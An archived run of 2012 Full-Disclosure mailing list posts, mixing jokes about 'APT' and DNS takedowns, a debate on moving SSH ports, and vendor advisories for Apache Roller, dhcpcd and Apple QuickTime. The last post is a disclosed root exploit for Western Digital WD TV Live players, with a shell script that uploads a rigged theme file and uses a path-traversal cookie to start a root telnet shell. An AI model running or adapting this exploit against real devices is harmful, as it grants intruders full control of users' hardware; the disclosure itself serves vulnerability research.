Re: [Full-disclosure] Warning is about APT

2012-06-25 Thread rancor
You know that was not for real, just someone making fun of one of the
characters on the list.

Don't waste your time
On Jun 25, 2012 9:09 PM, "c-APT-ure"  wrote:

> Hi mustntlive
>
> could you maybe try a better translation service so that it's easier to
> understand the meaning of your messages? (I assume this is automated
> translation from your native language)
>
> thanks however for this great site about APT. it's really great !! (i'm
> not just saying this because i live in .ch)
>
> finally someone talks "About APT" and "Who We Are"
>
> http://www.apt.ch/index.php?option=com_k2&view=item&layout=item&id=666&Itemid=41&lang=en
> (notice the "id = 666" there in the url !? coincidence?)
>
> "The APT seeks to achieve this vision through a preventive and cooperative
> approach. The APT works globally, regionally and nationally with a wide
> range of partners including State authorities, national institutions and
> civil society [a.k.a. Hackers]."
>
> "The APT is convinced that the prevention of [...] is best achieved
> through three integrated elements:
>
> - Promoting *effective monitoring and transparency* [...]
> - Contributing to effective international and national *[...]
>   frameworks* [...]
> - Ensuring that *international and national actors* have the necessary
>   *determination and capacity* [...]"
>
> "The APT has been leading the international campaign [...] (OPCAT)."
>
> "The APT’s multi-disciplinary and multi-cultural team has expertise in
> training, providing legal advice, developing practical tools, facilitating
> exchanges and advocating for preventive measures and mechanisms."
>
> "The APT develops and disseminates practical tools to [...]"
>
> "*The APT works in cooperation with a relatively broad variety of
> partners, who share its objectives, such as state authorities, police
> services, [...]*"
>
> * they name the Regions in which the APT is active. [really? all
> continents?]
> * under "Publications & Tools" they publish "The Optional Protocol - A
> Manual for Prevention"
>
> though the claim on the main page might not be true anymore:
>
> *'No one knows about us'*
>
> well, at least they are not legion and we don't need to expect them like
> some other group(s) (they are already here, or not?)
>
>
> it's all about the context you read it in :-)
>
> i didn't know there is more than one definition for the APT ("the proper
> noun").
>
> cheers,
> @c_APT_ure
>
>
> On Fri, Jun 22, 2012 at 8:05 PM, Григорий Братислава 
> wrote:
>
>> Hello full disclosure!! !! !!
>>
>> Is like to warn you about APT. APT is mean Association for is
>> Prevention of is Torture. http://www.apt.ch
>>
>> Is musntlive receive email from APT is say to stop using their name
>> for mean malware from China.
>>
>> Is musntlive's best interest to believe is this APT overflow is come
>> from Richard Bejtlich of Taosecurity and Mandiant.
>>
>> Please Richard, is stop say APT so much. If is you must say give space
>> between China and is APT. Everything is not China!! Thank you. Is say
>> hi to Amy
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

2012-06-25 Thread rancor
I like this thread =) Kind of the surf'aholic disaster plan for idiots, and
it's amusing in its own sad way.
On Jun 25, 2012 9:52 PM,  wrote:

> > Do you know? Even in a DNS takedown you can access your favourite
> > sites.
> >
> > People may think that in a DNS shutdown they can lose access to the
> > websites they are addicted to.
> >
> >
> > But after reading this article you will know how easily you can access
> > your websites. You can access them by typing their IP address in your
> > web-browser.
> >
> > Copy the IP addresses given below:
> >
> > tumblr.com 174.121.194.34
> > wikipedia.org 208.80.152.201
>
> Is this post some kind of joke? Anyone who has played even a bit with web
> servers knows this. In the event of a DNS takedown your site is pretty much
> done. I don't think regular visitors track down a site's IPs and visit it
> again when it 'disappears' ...
>
> >
> > Original Article:
> > http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
> >

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

2012-06-25 Thread nix
> Do you know? Even in a DNS takedown you can access your favourite
> sites.
>
> People may think that in a DNS shutdown they can lose access to the
> websites they are addicted to.
>
>
> But after reading this article you will know how easily you can access
> your websites. You can access them by typing their IP address in your
> web-browser.
>
> Copy the IP addresses given below:
>
> tumblr.com 174.121.194.34
> wikipedia.org 208.80.152.201

Is this post some kind of joke? Anyone who has played even a bit with web
servers knows this. In the event of a DNS takedown your site is pretty much
done. I don't think regular visitors track down a site's IPs and visit it
again when it 'disappears' ...

>
> Original Article:
> http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
>


Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

2012-06-25 Thread Thor (Hammer of God)
What, no one uses the HOSTS file anymore?


Timothy "Thor"  Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible


From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Nate Theis
Sent: Monday, June 25, 2012 12:28 PM
To: jweyr...@gmail.com
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?


And don't forget

lists.grok.org.uk 127.0.0.1
On Jun 25, 2012 11:15 AM, "Jardel" <jweyr...@gmail.com> wrote:
Do you know? Even in a DNS takedown you can access your favourite sites.

People may think that in a DNS shutdown they can lose access to the websites
they are addicted to.


But after reading this article you will know how easily you can access your
websites. You can access them by typing their IP address in your web-browser.

Copy the IP addresses given below:

tumblr.com 174.121.194.34
wikipedia.org 208.80.152.201

Original Article:
http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html


Re: [Full-disclosure] server security

2012-06-25 Thread Thor (Hammer of God)
Well, even if they are trying to get into your network specifically, you make 
them do more work.  They have to scan *and* identify the services.  The more 
scanning, fingerprinting, posting, peeking and poking they do (see what I did 
there? :) ) the louder they are and the more likely the attack is to be 
detected.  

This particular subject continues to come up, and there continues to be debate 
about the value, but I actually don't see how it can't be viewed as a security 
control, albeit a relatively trivial one to bypass.  Security in depth works. 

Timothy "Thor"  Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible


-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Daniel Hadfield
Sent: Thursday, June 21, 2012 12:49 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] server security

It depends what the attackers motive is. Is he/she trying to get as many 
machines infected as he/she can. Or is he/she trying to get into YOUR network.

My 2c

On 21/06/2012 20:20, Thor (Hammer of God) wrote:
> I completely agree with Gage.  The way I see it, security through obscurity 
> is perfectly valid as long as the control remains obscured.  I think the 
> "anyone can just scan your ports" is somewhat specious in that most (if not 
> something like 99% or so (unqualified opinion of course)) traffic is simply 
> noise and scans for standard ports.  This is particularly true when it 
> matters most: during a worm outbreak or a newly published vulnerability.  
> Attackers simply don't have the time nor the inclination to go through and 
> perform slow and loud scans when they can quickly move on to the next target. 
> If 90% of the targets have services on the default ports, then it makes far 
> more sense to just go after the easy targets.  
>
> Perfect case-in-point is the recent RDP unpleasantness.   Non-standard port 
> deployments were automatically removed from the target scans for 3389.  I 
> don't see how anyone can argue against the security value of such a 
> configuration.
>
> t
>
>
>
> Timothy "Thor"  Mullen
> www.hammerofgod.com
> Thor's Microsoft Security Bible
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
> Sent: Thursday, June 21, 2012 9:25 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] server security
>
> Well that's a bit of an iffy one. I'd say it IS a security measure, albeit one 
> that is solely effective if and only if compounded with other measures.
>
> It's unlikely, but you never know, you just might miss out on a nasty worm 
> all because you weren't running on a default port one day.
>
> On Thu, Jun 21, 2012 at 8:52 AM, Rob  wrote:
>> We need to make a distinction between security and obscurity here. The only 
>> time changing ports actually hardens a service in any way is when the port 
>> requires elevated rights to bind, changing to 1025 for example removes the 
>> root requirement. Any actual or theoretical vulnerabilities still exist. If 
>> somebody is looking at your server, they'll find the port without much 
>> trouble. Alternate ports can remove junk traffic from logs, so there is a 
>> benefit, if not entirely a security one.
>>
>> Rob
>>
>>
>> Sent on the Sprint® Now Network from my BlackBerry®
>>
>> -Original Message-
>> From: Alex Dolan 
>> Sender: listbou...@securityfocus.com
>> Date: Thu, 21 Jun 2012 07:44:57
>> To: Littlefield, Tyler
>> Cc: 
>> Subject: Re: server security
>>
>> One tip I have is to set SSH to a port other than 22; I don't need to 
>> tell anyone how devastating it is if someone did actually get access 
>> to that service. Putting it on some other port reduces your risk.
>>
>> On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler  
>> wrote:
>>> Hello:
>>> I have a couple questions. First, I'll explain what I did:
>>> I set up iptables and removed all unwanted services. Iptables blocks 
>>> everything, then only opens what it wants. I also use the addrtype 
>>> module to limit broadcast and unspec addresses, etc. I also do some 
>>> malformed packet work where I just drop everything that looks 
>>> malformed (mainly by the flags).
>>> 2) I secured ssh: blocked root logins, set it up so only users in the 
>>> sshusers group can connect, and set it only to allow ppk.
>>> 3) I installed aid.
>>> 4) disabled malformed packets and forwarding/etc in sysctl.
>>> This is a basic web server that runs email, web and a couple other things.
>>> It's only running on a linode512, so I don't have the ability to set 
>>> up a ton of stuff; I also think that would make things more of a 
>>> mess. What else would be recommended?
>>> Also, I'm looking to add something to the web server; sometimes I 
>>> notice that there are a lot of requests from people scanning for 
>>> common urls like wordpress/phpbb3/etc,
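Thor's point above is that an attacker who has to hunt for a moved service makes more noise than the mass scans aimed at default ports. The following added example (not code from the thread) shows what that looks like in a firewall log: it parses constructed iptables LOG lines for inbound SYNs, counts distinct destination ports per source, and separates many-port scanners from default-port noise; the log lines, the documentation-range addresses and SSH on port 2222 are assumptions for the demo.

```python
import re
from collections import defaultdict

# Ports that background noise (worms, mass scanners) keeps hammering.
DEFAULT_PORTS = {21, 22, 23, 25, 80, 443, 445, 1433, 3306, 3389}

# The port SSH was moved to on this host (assumption for the demo).
MOVED_SSH_PORT = 2222


def _syn_line(ts: str, src: str, dpt: int, spt: int = 40000) -> str:
    """Build one constructed iptables LOG line for an inbound TCP SYN.
    Addresses are documentation ranges, not real traffic."""
    return (f"Jun 25 {ts} web kernel: [ 841.2] IPT-SYN: IN=eth0 OUT= "
            f"SRC={src} DST=203.0.113.10 LEN=60 TOS=0x00 PREC=0x00 TTL=52 "
            f"ID=0 DF PROTO=TCP SPT={spt} DPT={dpt} WINDOW=29200 RES=0x00 SYN URGP=0")


# Constructed sample log: two sources of worm-style noise on default ports,
# one legitimate user reaching the moved SSH port, and one targeted attacker
# who has to hunt for the moved service and is therefore loud.
SAMPLE_LOG = [
    _syn_line("12:00:01", "198.51.100.7", 22),
    _syn_line("12:00:02", "198.51.100.7", 3389),
    _syn_line("12:00:03", "198.51.100.7", 445),
    _syn_line("12:00:09", "198.51.100.23", 3389),
    _syn_line("12:00:15", "198.51.100.200", MOVED_SSH_PORT),
] + [
    _syn_line(f"12:01:{i:02d}", "192.0.2.66", port)
    for i, port in enumerate(
        [21, 22, 23, 80, 443, 1022, 2022, 2200, 2202, 2210, MOVED_SSH_PORT, 8022])
]

LINE_RE = re.compile(r"SRC=(?P<src>[\d.]+) .*?PROTO=TCP SPT=\d+ DPT=(?P<dpt>\d+)")


def ports_by_source(lines):
    """Map each source IP to the set of distinct TCP destination ports it touched."""
    seen = defaultdict(set)
    for line in lines:
        match = LINE_RE.search(line)
        if match:
            seen[match["src"]].add(int(match["dpt"]))
    return dict(seen)


def classify(lines, scan_threshold: int = 5):
    """Label each source: 'port-scan' when it touched at least scan_threshold
    distinct ports, 'default-port-noise' when every port it touched is a
    well-known one, 'other' for the rest (e.g. a single hit on the moved port)."""
    labels = {}
    for src, ports in ports_by_source(lines).items():
        if len(ports) >= scan_threshold:
            labels[src] = "port-scan"
        elif ports <= DEFAULT_PORTS:
            labels[src] = "default-port-noise"
        else:
            labels[src] = "other"
    return labels


def moved_service_probes(lines, moved_port: int = MOVED_SSH_PORT):
    """Sources that reached the non-default port. Noise aimed at default ports
    never lands here, so every hit is either a legitimate user or someone who
    went looking, and the classify() label tells the two apart."""
    return sorted(src for src, ports in ports_by_source(lines).items()
                  if moved_port in ports)


if __name__ == "__main__":
    for src, label in classify(SAMPLE_LOG).items():
        print(f"{src:16} {label}")
    print("reached port", MOVED_SSH_PORT, ":", moved_service_probes(SAMPLE_LOG))
```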

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

2012-06-25 Thread Nate Theis
And don't forget

lists.grok.org.uk 127.0.0.1
On Jun 25, 2012 11:15 AM, "Jardel"  wrote:

> Do you know? Even in a DNS takedown you can access your favourite
> sites.
>
> People may think that in a DNS shutdown they can lose access to the
> websites they are addicted to.
>
>
> But after reading this article you will know how easily you can access
> your websites. You can access them by typing their IP address in your
> web-browser.
>
> Copy the IP addresses given below:
>
> tumblr.com 174.121.194.34
> wikipedia.org 208.80.152.201
>
> Original Article:
> http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
>

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

2012-06-25 Thread Peter Dawson
quick quick nuke the co-ord [ 49°28'14" North | 16°56'48" East ]


On Mon, Jun 25, 2012 at 2:49 PM, Jardel Weyrich  wrote:

> And you're trying to impersonate someone by using my email address as
> sender? I don't get it.
>
> Received: from emkei.cz (emkei.cz [46.167.245.118])
>by lists.grok.org.uk (Postfix) with ESMTP id BBB2CCB
>for ;
>Mon, 25 Jun 2012 19:14:27 +0100 (BST)
> Received: by emkei.cz (Postfix, from userid 33)
>id BC04FD58DA; Mon, 25 Jun 2012 20:06:43 +0200 (CEST)
> To: full-disclosure@lists.grok.org.uk
> From: "Jardel" 
>
> -- jardel
>
> On Mon, Jun 25, 2012 at 3:06 PM, Jardel  wrote:
> > Do you know? Even in a DNS takedown you can access your favourite
> > sites.
> >
> > People may think that in a DNS shutdown they can lose access to the
> > websites they are addicted to.
> >
> >
> > But after reading this article you will know how easily you can access
> > your websites. You can access them by typing their IP address in your
> > web-browser.
> >
> > Copy the IP addresses given below:
> >
> > tumblr.com 174.121.194.34
> > wikipedia.org 208.80.152.201
> >
> > Original Article:
> > http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
> >

[Full-disclosure] Entropy distribution to virtual machines

2012-06-25 Thread coderman
On Mon, Jun 25, 2012 at 12:21 AM, BMF  wrote:
> ...
> I have a server with one of these in it:
>
> http://www.entropykey.co.uk/
>
> although I still need to find a reasonably secure way to share the
> entropy with all of my VMs where it is really needed.

Check out http://www.vanheusden.com/entropybroker/ or virtio-rng.
I haven't used either; does anyone have positive experiences?

For now I roll my own: pass entropy in on the guest kernel command line,
which is mixed into the guest pool during init, then distribute entropy
from host to guest EGDs via TCP once networking is up.



Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

2012-06-25 Thread nake
Is that so? As far as I know, if the host has multiple websites you
need more info than just the IP. For example, my webpage
(nakerium.com) is on shared hosting.
If I ping it, it says that its IP is: 159.253.149.218
However, if I just enter that IP in my browser it just shows a random
page from my host, because the server doesn't know which webpage I want
to see.
In order to see my webpage I need to enter
http://159.253.149.218/~nakerium

Most of the time it should be straightforward to add the
"/~websitename", but it depends on how the host has defined their server.

On 25/06/2012 20:06, Jardel wrote:
> Do you know? Even in a DNS takedown you can access your
> favourite sites.
> 
> People may think that in a DNS shutdown they can lose access to
> the websites they are addicted to.
> 
> 
> But after reading this article you will know how easily you can
> access your websites. You can access them by typing their IP
> address in your web-browser.
> 
> Copy the IP addresses given below:
> 
> tumblr.com 174.121.194.34
> wikipedia.org 208.80.152.201
> 
> Original Article:
> http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
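nake's point above is that a bare IP only reaches the host's default site, because a shared host picks the site from the Host header; Thor's HOSTS-file remark is the usual workaround. The following added example (not code from the thread) simulates both sides offline: a hosts-file parser, the request a browser builds from a URL, and a name-based virtual host dispatcher. The vhost table, document roots and hosts-file snippet are constructed; the IP 159.253.149.218 and the /~nakerium path are the ones quoted in the post.

```python
from __future__ import annotations

import ipaddress
from urllib.parse import urlsplit

# Constructed vhost table for a shared host.  "_default_" is the site a
# name-based server falls back to when no configured name matches the Host
# header (the "random page from my host" in the post above).
VHOSTS = {
    "_default_": "/var/www/hosting-landing-page",
    "nakerium.com": "/home/nakerium/public_html",
    "www.nakerium.com": "/home/nakerium/public_html",
    "othercustomer.example": "/home/othercustomer/public_html",
}

# Userdir-style mapping: /~user/... still works without a matching Host
# header, which is why http://159.253.149.218/~nakerium reaches the site.
USERDIR = {"nakerium": "/home/nakerium/public_html"}

# Constructed hosts-file snippet: the entry you would add if DNS were gone.
HOSTS_FILE = """
# IP            names
159.253.149.218  nakerium.com www.nakerium.com
"""


def parse_hosts(text: str) -> dict[str, str]:
    """Parse hosts-file syntax: IP, then one or more names; '#' starts a comment."""
    table: dict[str, str] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            table[name.lower()] = ip
    return table


def build_request(url: str, hosts: dict[str, str]) -> tuple[str, bytes]:
    """What a browser does with a URL when DNS is unavailable: resolve the
    name through the hosts table, but keep the *name* in the Host header.
    Returns (IP to connect to, raw HTTP/1.1 request).  Raises ValueError
    when the name is neither in the hosts table nor an IP literal."""
    parts = urlsplit(url)
    name = parts.hostname or ""
    path = parts.path or "/"
    ip = hosts.get(name.lower())
    if ip is None:
        # No DNS and no hosts entry: only a literal IP typed by the user works.
        ip = str(ipaddress.ip_address(name))
    raw = f"GET {path} HTTP/1.1\r\nHost: {name}\r\nConnection: close\r\n\r\n"
    return ip, raw.encode("ascii")


def parse_request(raw: bytes) -> tuple[str, dict[str, str]]:
    """Return (request target, lower-cased header map) from a raw request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    request_line, *header_lines = head.split("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return target, headers


def select_docroot(raw: bytes) -> tuple[str, str]:
    """Dispatch the way a name-based virtual host server does: match the Host
    header (port stripped) against configured names, fall back to userdir
    paths, and otherwise serve the default site."""
    target, headers = parse_request(raw)
    hostname = headers.get("host", "").split(":")[0].lower()
    if hostname in VHOSTS:
        return hostname, VHOSTS[hostname]
    if target.startswith("/~"):
        user = target[2:].split("/", 1)[0]
        if user in USERDIR:
            return "userdir:" + user, USERDIR[user]
    return "_default_", VHOSTS["_default_"]


def demo() -> dict[str, tuple[str, str]]:
    """Which site each URL lands on when only the hosts file resolves names."""
    hosts = parse_hosts(HOSTS_FILE)
    results = {}
    for url in ("http://159.253.149.218/",
                "http://159.253.149.218/~nakerium/",
                "http://nakerium.com/"):
        ip, raw = build_request(url, hosts)
        results[url] = (ip, select_docroot(raw)[0])
    return results


if __name__ == "__main__":
    for url, (ip, site) in demo().items():
        print(f"{url:40} -> connect {ip}, served as {site}")
```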


[Full-disclosure] CVE-2012-2381: Apache Roller Cross-Site-Scripting (XSS) vulnerability

2012-06-25 Thread Dave
Severity: important

Vendor: The Apache Software Foundation

Versions Affected:
Roller 4.0.0 to Roller 4.0.1
Roller 5.0
The unsupported Roller 3.1 release is also affected

Description:
Roller trusts bloggers to post HTML and JavaScript code in the weblog,
and for some sites this can be a problem because users are untrusted
and could post malicious code and exploit XSS. This issue has been
addressed by adding a new configuration property, weblogAdminsUntrusted,
which, when set to 'true', causes all weblog content to be HTML
sanitized.

Mitigation
Roller 4.0 and 4.0.1 users should upgrade to Roller 5.0.1
Roller 5.0 users should upgrade to Roller 5.0.1
Roller 3.1 users should upgrade to Roller 5.0.1

Credit:
This issue was discovered by Jun Zhu, PhD student, University of North
Carolina, Charlotte



[Full-disclosure] CVE-2012-2380: Apache Roller Cross-Site-Resource-Forgery (XSRF) vulnerability

2012-06-25 Thread Dave
Severity: important

Vendor: The Apache Software Foundation

Versions Affected:
Roller 4.0.0 to Roller 4.0.1
Roller 5.0
The unsupported Roller 3.1 release is also affected

Description:
HTTP POST interfaces in the Roller admin/editor console were not
protected from CSRF attacks. This issue has been fixed by requiring a
valid per user and per session "salt" value in all HTTP POST requests.

Mitigation
Roller 4.0 and 4.0.1 users should upgrade to Roller 5.0.1
Roller 5.0 users should upgrade to Roller 5.0.1
Roller 3.1 users should upgrade to Roller 5.0.1

Credit:
This issue was discovered by Jun Zhu, PhD student, University of North
Carolina, Charlotte



Re: [Full-disclosure] Warning is about APT

2012-06-25 Thread c-APT-ure
Hi mustntlive

could you maybe try a better translation service so that it's easier to
understand the meaning of your messages? (I assume this is automated
translation from your native language)

thanks however for this great site about APT. it's really great !! (i'm not
just saying this because i live in .ch)

finally someone talks "About APT" and "Who We Are"
http://www.apt.ch/index.php?option=com_k2&view=item&layout=item&id=666&Itemid=41&lang=en
(notice the "id = 666" there in the url !? coincidence?)

"The APT seeks to achieve this vision through a preventive and cooperative
approach. The APT works globally, regionally and nationally with a wide
range of partners including State authorities, national institutions and
civil society [a.k.a. Hackers]."

"The APT is convinced that the prevention of [...] is best achieved through
three integrated elements:

   - Promoting *effective monitoring and transparency* [...]
   - Contributing to effective international and national *[...]
     frameworks* [...]
   - Ensuring that *international and national actors* have the
     necessary *determination and capacity* [...]"

"The APT has been leading the international campaign [...] (OPCAT)."

"The APT’s multi-disciplinary and multi-cultural team has expertise in
training, providing legal advice, developing practical tools, facilitating
exchanges and advocating for preventive measures and mechanisms."

"The APT develops and disseminates practical tools to [...]"

"*The APT works in cooperation with a relatively broad variety of partners,
who share its objectives, such as state authorities, police services, [...]*"

* they name the Regions in which the APT is active. [really? all
continents?]
* under "Publications & Tools" they publish "The Optional Protocol - A
Manual for Prevention"

though the claim on the main page might not be true anymore:

*'No one knows about us'*

well, at least they are not legion and we don't need to expect them like
some other group(s) (they are already here, or not?)


it's all about the context you read it in :-)

i didn't know there is more than one definition for the APT ("the proper
noun").

cheers,
@c_APT_ure


On Fri, Jun 22, 2012 at 8:05 PM, Григорий Братислава wrote:

> Hello full disclosure!! !! !!
>
> Is like to warn you about APT. APT is mean Association for is
> Prevention of is Torture. http://www.apt.ch
>
> Is musntlive receive email from APT is say to stop using their name
> for mean malware from China.
>
> Is musntlive's best interest to believe is this APT overflow is come
> from Richard Bejtlich of Taosecurity and Mandiant.
>
> Please Richard, is stop say APT so much. If is you must say give space
> between China and is APT. Everything is not China!! Thank you. Is say
> hi to Amy
>

Re: [Full-disclosure] Sunday Fodder

2012-06-25 Thread Darius Jahandarie
On Sun, Jun 24, 2012 at 4:06 PM, Thor (Hammer of God)
 wrote:
> For the FB’ers out there, the “Hacker News” (arguably accurate) has posted
> an incendiary photo alleging US soldier posing with the dead and supposedly
> engaged in “The Ichabod.”  The funny part of it is to go through and count
> the number of posts that threaten the lives of Americans; each one of these
> poor sods’ accounts are going to have their full history dumped, stored, and
> analyzed.

Hey, if the US government realizes this sort of pre-attack
investigation stuff works better than their security theater at the
airports, maybe my day-to-day life will improve.


--
Darius Jahandarie


[Full-disclosure] Exploit for Intel SYSRET "vulnerability" on FreeBSD

2012-06-25 Thread Hunger
https://www.youtube.com/watch?v=1UeJXokbja0

Exploit release coming soon... ;-)

Cheers,

Hunger



Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

2012-06-25 Thread Jardel Weyrich
And you're trying to impersonate someone by using my email address as
sender? I don't get it.

Received: from emkei.cz (emkei.cz [46.167.245.118])
by lists.grok.org.uk (Postfix) with ESMTP id BBB2CCB
for ;
Mon, 25 Jun 2012 19:14:27 +0100 (BST)
Received: by emkei.cz (Postfix, from userid 33)
id BC04FD58DA; Mon, 25 Jun 2012 20:06:43 +0200 (CEST)
To: full-disclosure@lists.grok.org.uk
From: "Jardel" 

-- jardel

On Mon, Jun 25, 2012 at 3:06 PM, Jardel  wrote:
> Do you know? Even in a DNS takedown you can access your favourite sites.
>
> People may think that in a DNS shutdown they can lose access to the websites
> they are addicted to.
>
>
> But after reading this article you will know how easily you can access your
> websites. You can access them by typing their IP address in your web-browser.
>
> Copy the IP addresses given below:
>
> tumblr.com 174.121.194.34
> wikipedia.org 208.80.152.201
>
> Original Article:
> http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
>


[Full-disclosure] [SE-2012-01] Security weakness in Apple QuickTime Java extensions (details released)

2012-06-25 Thread Security Explorations

Hello All,

Security Explorations decided to release technical details and accompanying
Proof of Concept code for a security vulnerability in Apple QuickTime software.
This move is made in response to Apple's evaluation of a reported issue as
a "hardening issue" rather than a security bug [1].

Security Explorations does not agree with the results of Apple's evaluation.
It does not support the approach of a "silent fix" either [2].

A vulnerability that was reported to the company on Apr 12, 2012 makes it
possible to bypass two security checks in Apple's code. That vulnerability
(Issue 22) leads to a serious violation of Java VM security. When combined
with Issue 15 affecting Oracle's Java SE [3], it can lead to a complete
compromise of a Java VM environment on a fully patched Windows OS with the
latest Java SE (1.6.0_33-b03) and Apple QuickTime (7.72.80.56) software
installed.

The case of an attack against Apple QuickTime software illustrates a common
trend in attacks against technologies such as Java VM, where more than one
partial security bypass issue usually needs to be combined to achieve a
complete security compromise. It is all the more surprising to see a vendor's
response downplaying the importance of an issue found in its code that can
actually contribute to a full-blown attack against the users of its software.

Security Explorations is publishing the following materials in the hope that
a wider public can conduct an independent evaluation of the Apple QuickTime
issue and deliver an unbiased judgment of both companies' claims:
- Short write-up presenting vulnerability details, its impact and a summary
   of the vendor's response,
- Proof of Concept code for Issue 22.

Download links for the above-mentioned materials are provided below:

http://www.security-explorations.com/materials/se-2012-01-22.pdf
http://www.security-explorations.com/materials/se-2012-01-22.zip

Thank you.

Best Regards,
Adam Gowdiak

-
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
-

References
[1] SE-2012-01 Vendors status
 http://www.securityexplorations.com/en/SE-2012-01-status.html
[2] About the security content of Java for OS X 2012-004 and Java for 
Mac OS X 10.6 Update 9
 http://support.apple.com/kb/HT5319
[3] SE-2012-01 Project, Security Vulnerabilities in Java SE
 http://www.securityexplorations.com/en/SE-2012-01-press.html



[Full-disclosure] [SECURITY] [DSA 2498-1] dhcpcd security update

2012-06-25 Thread Yves-Alexis Perez

- -
Debian Security Advisory DSA-2498-1   secur...@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
June 23, 2012  http://www.debian.org/security/faq
- -

Package: dhcpcd
Vulnerability  : remote stack overflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-2152
Debian Bug : #671265

It was discovered that dhcpcd, a DHCP client, was vulnerable to a stack
overflow. A malformed DHCP message could crash the client, causing a denial of
service, and potentially remote code execution through properly designed
malicious DHCP packets.

For the stable distribution (squeeze), this problem has been fixed in
version 1:3.2.3-5+squeeze1.

For the testing distribution (wheezy), this problem has been fixed in
version 1:3.2.3-11.

For the unstable distribution (sid), this problem has been fixed in
version 1:3.2.3-11.

We recommend that you upgrade your dhcpcd package.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org


[Full-disclosure] Root Exploit Western Digital's WD TV Live SMP/Hub (all released firmware releases)

2012-06-25 Thread Wolf Bee
Introduction

The WD TV Live Streaming Media Player is a consumer device to play 
various audio and video formats.
Additionally it allows access to multiple video streaming services like 
Netflix, Hulu or Youtube.[1]
The device allows customization of its user interface and limited remote 
administration using a web interface.

The LIVE SMP is running a customized Linux kernel and userland.
Parts of the firmware are released under the terms of the GNU General 
Public License.
Proprietary binaries are included in encrypted parts of the firmware 
which are decrypted during runtime.

1. Affected Versions

The analysed firmware is the latest version (1.07.15 as of 03/2012) as 
published on [2]; prior versions are vulnerable too.
Large portions of the firmware are shared with the WDTV Live Hub[3], thus 
the presented findings are applicable to this device with minor changes 
as described later.

2. Attack Vector

The attack vector used to gain root access on the device involves two 
implementation flaws as described in the following sections.

2.1. User Input Validation Flaws

The web interface is written using the PHP language.
Several files contain user input validation flaws similar to the one 
described here.
Cookie header values in /opt/webserver/htdocs/index.php are not 
validated at all.
The provided cookie value is used within an include statement allowing 
the attacker to force inclusion of arbitrary files (as long as they are 
named home.php).

2.2. Possibility to Upload Arbitrary Files

To allow the customization of the user interface one may upload theme 
files (zip archives) through the web interface.
The contents of these archives are not restricted so adding a file named 
home.php is possible.

2.3. Limitations

Most of the PHP files of the web interface include security.php, which 
limits access to the network's IP/subnet mask combination the LIVE SMP is 
connected to.
The aforementioned index.php is guarded by this security measure, but uploading 
a theme file using upload.php is possible from any IP address.

3. Proof of Concept

The following script will spawn a telnet daemon providing access to a 
root shell on the device.
(needs zip and curl binaries)

#!/bin/sh
THEME_NAME="blub"

if [ $# != 1 ]; then
  TARGET="orpheus"
  echo "Root Exploit for WDTV Live SMP\n\nUsing default 
target=${TARGET}\nUSAGE: $0 \n\n"
else
  TARGET=$1
fi

if [ ! -f "home.php" ]; then
  echo ' home.php
fi

if [ ! -f "${THEME_NAME}.zip" ]; then
  touch meta.xml
  zip ${THEME_NAME} home.php meta.xml
fi

echo "Uploading ${THEME_NAME}.zip:"
curl -F appearance=@${THEME_NAME}.zip -o /dev/null \
  http://${TARGET}/upload.php

echo "\n\nRunning payload:"
curl --cookie "language=../../../../usrdata/.wd_tv/theme/${THEME_NAME}" \
  http://${TARGET}/index.php

4. Adaptation for the Live Hub

As the LIVE HUB does not have the ability to upload themes through the 
web interface, one needs to use a different angle to upload the payload:
Using the samba share WDTVLiveHub. Thus the language cookie has to be 
adapted as shown here:

curl --cookie "language=../../../../mediaitems/Local/WDTVLiveHub/" \
  http://${TARGET}/index.php

5. Code, Whitepaper, Example Session, References

Code, whitepaper, example session: http://hammerhead.shark23.de

[1] Western Digital. WD TV Live, .
URL http://wdc.com/en/products/products.aspx?id=330.
[2] Western Digital. Downloads WD TV Live Streaming Media Player (Gen 
3), 2012.
URL 
http://support.wdc.com/product/download.asp?groupid=1011&sid=161&lang=en.
[3] Western Digital. WD TV Live Hub, .
URL http://wdc.com/en/products/products.aspx?id=570.
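
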